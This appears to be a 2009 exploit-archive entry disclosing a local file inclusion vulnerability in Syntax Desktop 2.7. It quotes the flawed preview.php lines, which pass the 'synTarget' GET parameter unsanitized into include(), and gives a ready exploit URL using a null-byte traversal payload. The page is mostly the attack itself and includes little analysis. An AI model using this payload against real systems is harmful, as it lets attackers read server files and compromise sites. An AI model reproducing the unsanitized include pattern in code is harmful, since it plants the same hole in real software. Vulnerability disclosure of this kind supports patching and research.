[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability
# Published : 2009-02-04
# Author : ahmadbady
# Previous Title : Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities
# Next Title : rgboard v4 5p1 (07.07.27) Multiple Remote Vulnerabilities
-----------------:local File Include:-----------------
-------------------------------------------------------
script: syntax-desktop 2-7
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0
------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php
line 42 $target=$_GET["synTarget"];
ob_start();
line 44 include("../../../$target");
-----------------------------------------------------
-----------------------------------------------------
xpl:
http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------
# www.Syue.com [2009-02-04]